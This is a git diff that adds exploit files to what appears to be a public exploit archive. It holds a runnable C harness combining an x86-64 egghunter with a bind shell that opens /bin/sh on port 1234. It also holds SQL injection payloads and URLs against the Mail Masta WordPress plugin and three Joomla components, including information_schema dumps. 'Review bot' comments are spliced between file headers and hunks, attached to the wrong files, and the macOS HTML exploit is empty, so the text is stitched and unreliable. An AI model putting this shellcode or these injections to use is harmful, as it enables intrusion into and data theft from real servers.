diff --git a/files.csv b/files.csv
index f585a64e1..d2d7b5a4c 100644
--- a/files.csv
+++ b/files.csv
@@ -15296,6 +15296,7 @@ id,file,description,date,author,platform,type,port
 41358,platforms/php/remote/41358.rb,"Piwik 2.14.0 / 2.16.0 / 2.17.1 / 3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80
 41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
 41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
+41443,platforms/macos/remote/41443.html,"macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -15912,6 +15913,7 @@ id,file,description,date,author,platform,type,port
 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
 41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
+41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -37354,3 +37356,7 @@ id,file,description,date,author,platform,type,port
 41432,platforms/ios/webapps/41432.txt,"Lock Photos Album&Videos Safe 4.3 - Directory Traversal",2017-02-21,Vulnerability-Lab,ios,webapps,0
 41433,platforms/php/webapps/41433.txt,"ProjectSend r754 - Insecure Direct Object Reference",2017-02-21,Vulnerability-Lab,php,webapps,0
 41437,platforms/linux/webapps/41437.txt,"Teradici Management Console 2.2.0 - Privilege Escalation",2017-02-22,hantwister,linux,webapps,0
+41438,platforms/php/webapps/41438.txt,"WordPress Plugin Mail Masta 1.0 - SQL Injection",2017-02-18,"Hanley Shun",php,webapps,0
+41440,platforms/php/webapps/41440.txt,"Joomla! Component Store for K2 3.8.2 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0
+41441,platforms/php/webapps/41441.txt,"Joomla! Component UserExtranet 1.3.1 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0
+41442,platforms/php/webapps/41442.txt,"Joomla! Component MultiTier 3.1 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/linux/shellcode/41439.c b/platforms/linux/shellcode/41439.c
new file mode 100755
index 000000000..4d2b6530e
--- /dev/null
+++ b/platforms/linux/shellcode/41439.c
@@ -0,0 +1,174 @@
+/**
+ Copyright © 2017 Odzhan. All Rights Reserved.
+
+ Redistribution and use in source and binary forms, with or without
+ modification, are permitted provided that the following conditions are
+ met:
+
+ 1. Redistributions of source code must retain the above copyright
+ notice, this list of conditions and the following disclaimer.
+
+ 2. Redistributions in binary form must reproduce the above copyright
+ notice, this list of conditions and the following disclaimer in the
+ documentation and/or other materials provided with the distribution.
+
+ 3. The name of the author may not be used to endorse or promote products
+ derived from this software without specific prior written permission.
+
+ THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
+ IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+ DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
+ INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+ SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
+ ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+ POSSIBILITY OF SUCH DAMAGE.
+
+; 38 byte Egg Hunter using sys_access() for x86-64 Linux
+;
+ bits 64
+
+ xor edi, edi ; rdi = 0
+ mul edi ; rax = 0, rdx = 0
+ xchg eax, esi ; rsi = F_OK
+ mov dh, 10h ; rdx = 4096
+nxt_page:
+ add rdi, rdx ; advance 4096 bytes
+nxt_addr:
+ push rdi ; save page address
+ add rdi, 8 ; try read 8 bytes ahead
+ push 21
+ pop rax ; rax = sys_access
+ syscall
+ pop rdi ; restore rdi
+ cmp al, 0xF2 ; -EFAULT means bad address
+ je nxt_page ; keep going until good read
+
+ ; put your own signature here
+ mov eax, 0xDEADC0DE
+ scasd
+ jne nxt_addr
+
+ scasd
+ jne nxt_addr
+
+ jmp rdi ; jump into shellcode
+
+
+ */
+
+#include
+#include
+#include
+#include
+
+#include
+#include
+#include
+#include
+
+#define EGG64_SIZE 38
+
+char EGG64[] = {
+ /* 0000 */ "\x31\xff" /* xor edi, edi */
+ /* 0002 */ "\xf7\xe7" /* mul edi */
+ /* 0004 */ "\x96" /* xchg esi, eax */
+ /* 0005 */ "\xb6\x10" /* mov dh, 0x10 */
+ /* 0007 */ "\x48\x01\xd7" /* add rdi, rdx */
+ /* 000A */ "\x57" /* push rdi */
+ /* 000B */ "\x48\x83\xc7\x08" /* add rdi, 0x8 */
+ /* 000F */ "\x6a\x15" /* push 0x15 */
+ /* 0011 */ "\x58" /* pop rax */
+ /* 0012 */ "\x0f\x05" /* syscall */
+ /* 0014 */ "\x5f" /* pop rdi */
+ /* 0015 */ "\x3c\xf2" /* cmp al, 0xf2 */
+ /* 0017 */ "\x74\xee" /* jz 0x7 */
+ /* 0019 */ "\xb8\xde\xc0\xad\xde" /* mov eax, 0xdeadc0de */
+ /* 001E */ "\xaf" /* scasd */
+ /* 001F */ "\x75\xe9" /* jnz 0xa */
+ /* 0021 */ "\xaf" /* scasd */
+ /* 0022 */ "\x75\xe6" /* jnz 0xa */
+ /* 0024 */ "\xff\xe7" /* jmp rdi */
+};
+
+// sig is 0xDEADC0DE
+#define EGG_SIG "\xDE\xC0\xAD\xDE"
+
+// 71 byte bind shell for x86-64 Linux.
+// listens on 0.0.0.0:1234
+//
+// port offset is 0x010
+//
+char BS[] = {
+ EGG_SIG
+ EGG_SIG
+ /* 0000 */ "\x6a\x29" /* push 0x29 */
+ /* 0002 */ "\x58" /* pop rax */
+ /* 0003 */ "\x6a\x01" /* push 0x1 */
+ /* 0005 */ "\x5e" /* pop rsi */
+ /* 0006 */ "\x6a\x02" /* push 0x2 */
+ /* 0008 */ "\x5f" /* pop rdi */
+ /* 0009 */ "\x99" /* cdq */
+ /* 000A */ "\x0f\x05" /* syscall */
+ /* 000C */ "\x97" /* xchg edi, eax */
+ /* 000D */ "\xbb\x02\xff\x04\xd2" /* mov ebx, 0xd204ff02 */
+ /* 0012 */ "\xfe\xc7" /* inc bh */
+ /* 0014 */ "\x53" /* push rbx */
+ /* 0015 */ "\x54" /* push rsp */
+ /* 0016 */ "\x5e" /* pop rsi */
+ /* 0017 */ "\xb2\x10" /* mov dl, 0x10 */
+ /* 0019 */ "\xb0\x31" /* mov al, 0x31 */
+ /* 001B */ "\x0f\x05" /* syscall */
+ /* 001D */ "\x31\xf6" /* xor esi, esi */
+ /* 001F */ "\xb0\x32" /* mov al, 0x32 */
+ /* 0021 */ "\x0f\x05" /* syscall */
+ /* 0023 */ "\xb0\x2b" /* mov al, 0x2b */
+ /* 0025 */ "\x0f\x05" /* syscall */
+ /* 0027 */ "\x97" /* xchg edi, eax */
+ /* 0028 */ "\x96" /* xchg esi, eax */
+ /* 0029 */ "\xb0\x21" /* mov al, 0x21 */
+ /* 002B */ "\x0f\x05" /* syscall */
+ /* 002D */ "\x83\xee\x01" /* sub esi, 0x1 */
+ /* 0030 */ "\x79\xf7" /* jns 0x29 */
+ /* 0032 */ "\x31\xf6" /* xor esi, esi */
+ /* 0034 */ "\x50" /* push rax */
+ /* 0035 */ "\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68" /* mov rcx, 0x68732f2f6e69622f */
+ /* 003F */ "\x51" /* push rcx */
+ /* 0040 */ "\x54" /* push rsp */
+ /* 0041 */ "\x5f" /* pop rdi */
+ /* 0042 */ "\x99" /* cdq */
+ /* 0043 */ "\xb0\x3b" /* mov al, 0x3b */
+ /* 0045 */ "\x0f\x05" /* syscall */
+};
+
+void xcode(char *s, int len)
+{
+ uint8_t *p;
+
+ p=(uint8_t*)mmap (0, len,
+ PROT_EXEC | PROT_WRITE | PROT_READ,
+ MAP_ANON | MAP_PRIVATE, -1, 0);
+
+ memcpy(p, s, len);
+
+ // execute
+ ((void(*)())p)();
+
+ munmap ((void*)p, len);
+}
+
+int main(int argc, char *argv[])
+{
+ uint8_t *sc=(uint8_t*)mmap (0, sizeof(BS),
+ PROT_EXEC | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+ if (sc != NULL) {
+ memcpy (sc, BS, sizeof(BS));
+ xcode (EGG64, EGG64_SIZE);
+ munmap((void*)sc, sizeof(BS));
+ }
+ return 0;
+}
diff --git a/platforms/macos/remote/41443.html b/platforms/macos/remote/41443.html
new file mode 100755
index 000000000..e58d98e31
--- /dev/null
+++ b/platforms/macos/remote/41443.html
@@ -0,0 +1,69 @@
+
+
+
diff --git a/platforms/php/webapps/41438.txt b/platforms/php/webapps/41438.txt
new file mode 100755
index 000000000..45a8f5b2b
--- /dev/null
+++ b/platforms/php/webapps/41438.txt
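Review bot: Neither mmap() result is checked correctly — xcode() dereferences p unconditionally and main() tests `sc != NULL`, but mmap() signals failure with MAP_FAILED ((void *)-1), never NULL. A single mapping requested as PROT_EXEC | PROT_WRITE | PROT_READ is exactly what execmem/W^X policies (SELinux execmem denial, PaX MPROTECT) refuse, so on such a host the memcpy() writes through (void *)-1 and the harness dies with a SIGSEGV that looks like a shellcode bug instead of a reported EPERM/ENOMEM. Change them to `if (p == MAP_FAILED) return;` before the memcpy in xcode() and `if (sc != MAP_FAILED) {` in main(). main()'s mapping also omits PROT_READ even though the hunter's scasd presumably reads the egg out of it; that only works because x86 cannot grant write without read, so spelling out PROT_READ there would make the intent explicit and portable.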
@@ -0,0 +1,80 @@
+# Exploit Title: Multiple SQL injection vulnerabilities in Mail Masta (aka mail-masta) plugin 1.0 for Wordpress.
+# Date: 02/18/2017
+# Exploit Author: Hanley Shun
+# Vendor Homepage: https://github.com/hamkovic/
+# Software Link: https://www.exploit-db.com/apps/78745b48b15bf2b81153556ef1c8ec48-mail-masta.zip
+# Version: 1.0
+# Tested on: Kali Linux x64, Ubuntu 14.04 x64
+# CVE : [CVE-2017-6095, CVE-2017-6096, CVE-2017-6097, CVE-2017-6098]
+
+
+Mail-Masta SQL Injection
+
+Page: ./wp-content/plugins/mail-masta/inc/lists/csvexport.php (Unauthenticated)
+
+GET Parameter: list_id
+
+http://my_wp_app/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php
+
+
+csvexport.php:
+
+$list_id=$_GET['list_id'];
+global $wpdb;
+$mail_subscribers = $wpdb->prefix . "masta_subscribers";
+$masta_list = $wpdb->prefix . "masta_list";
+$check_sql = "SELECT * FROM $mail_subscribers WHERE list_id = $list_id";
+$check_list="SELECT * FROM $masta_list WHERE list_id= $list_id";
+$wp_list=$wpdb->get_results($check_sql);
+$wp_list_s=$wpdb->get_results($check_list);
+
+
+Page: ./wp-content/plugins/mail-masta/inc/lists/view-list.php (Requires Wordpress admin)
+
+GET Parameter: filter_list
+
+http://my_wp_app/wp-admin/admin.php?page=masta-lists&action=view_list&filter_list=0+OR+1%3D1
+
+
+view-list.php:
+
+global $wpdb;
+$list_id = $_GET['filter_list'];
+$masta_list = $wpdb->prefix . "masta_list";
+$masta_subscribers = $wpdb->prefix . "masta_subscribers";
+$listdata = $wpdb->get_results( $wpdb->prepare("SELECT * FROM $masta_list WHERE list_id= $list_id",$query));
+$list_subscribers = $wpdb->get_var( $wpdb->prepare("SELECT COUNT( `list_id` ) FROM $masta_subscribers WHERE list_id= $list_id AND status=1",$query));
+
+
+Page: ./wp-content/plugins/mail-masta/inc/campaign/count_of_send.php (Requires Wordpress admin)
+
+POST Parameter: camp_id
+
+http://my_wp_app/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php/?pl=/var/www/html/wordpress/wp-load.php
+
+
+count_of_send.php:
+
+include($_GET['pl']);
+global $wpdb;
+$camp_id=$_POST['camp_id'];
+$masta_reports = $wpdb->prefix . "masta_reports";
+$count=$wpdb->get_results("SELECT count(*) co from $masta_reports where camp_id=$camp_id and status=1");
+
+
+Page: ./wp-content/plugins/mail-masta/inc/campaign_save.php (Requires Wordpress admin)
+
+POST Parameter: list_id
+
+campaign_save.php:
+
+$list_id=$_POST['list_id'];
+$check_list = $wpdb->get_var("SELECT count(id) FROM wp_masta_subscribers where list_id=$list_id");
+
+
+POST /wp-admin/admin-ajax.php?id= HTTP/1.1
+
+...snip...
+
+action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1
+
diff --git a/platforms/php/webapps/41440.txt b/platforms/php/webapps/41440.txt
new file mode 100755
index 000000000..666193e5e
--- /dev/null
+++ b/platforms/php/webapps/41440.txt
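Review bot: The view-list.php excerpt shows the root cause the advisory never states: `$wpdb->prepare()` is called, but `$list_id` is interpolated into the format string instead of being passed as a `%d` argument, so prepare() has nothing to escape and the call is no safer than the raw `get_results()` in csvexport.php. A one-line remediation note would help triage — every listed query needs the identifier bound as a placeholder, e.g. `$wpdb->prepare("SELECT * FROM $masta_list WHERE list_id = %d", $list_id)`, or cast with `(int)` before use. The count_of_send.php excerpt also contains `include($_GET['pl']);`, an unvalidated include that the advisory only uses to load wp-load.php but which a fix for these CVEs should remove as well.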
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Joomla! Component Store for K2 v3.8.2 - SQL Injection
+# Google Dork: inurl:index.php?option=com_k2store
+# Date: 23.02.2017
+# Vendor Homepage: http://jworkplace.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/store-for-k2/
+# Demo: http://k2store.jworkplace.com/
+# Version: 3.8.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_k2store&view=checkout&task=getCountry&=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41441.txt b/platforms/php/webapps/41441.txt
new file mode 100755
index 000000000..b9f0b1a42
--- /dev/null
+++ b/platforms/php/webapps/41441.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Joomla! Component UserExtranet v1.3.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_userextranet
+# Date: 23.02.2017
+# Vendor Homepage: http://www.beesto.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/access-a-security/site-access/userextranet/
+# Demo: http://www.beesto.com/extensions/18-userextranet/93-demo
+# Version: 1.3.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/index.php?option=com_userextranet&view=folders&fid=[SQL]
+# 66+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
+# # # # #
diff --git a/platforms/php/webapps/41442.txt b/platforms/php/webapps/41442.txt
new file mode 100755
index 000000000..ee8727106
--- /dev/null
+++ b/platforms/php/webapps/41442.txt
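Review bot: The reproduction line in 41440.txt names no parameter — the injection point is written as `&=[SQL]` after `task=getCountry`, so the advisory cannot be confirmed, triaged or mapped to a fix as published. The affected parameter name should be filled in (`&[parameter]=[SQL]`, with the real name), or the line marked as incomplete until the author supplies it.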
@@ -0,0 +1,23 @@
+# # # # #
+# Exploit Title: Joomla! Component MultiTier v3.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_multitier
+# Date: 23.02.2017
+# Vendor Homepage: http://www.beesto.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/affiliate-systems/multitier/
+# Demo: http://www.beesto.com/extensions/13-j-multitier/40-demo
+# Version: 3.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodel&tid=1&lid=[SQL]
+# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
+# http://localhost/[PATH]/index.php/component/multitier/?mtpage=link_preview&id=[SQL]
+# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
+# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodeb&tid=1&bid=[SQL]
+# -66'+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3+-- -
+# # # # #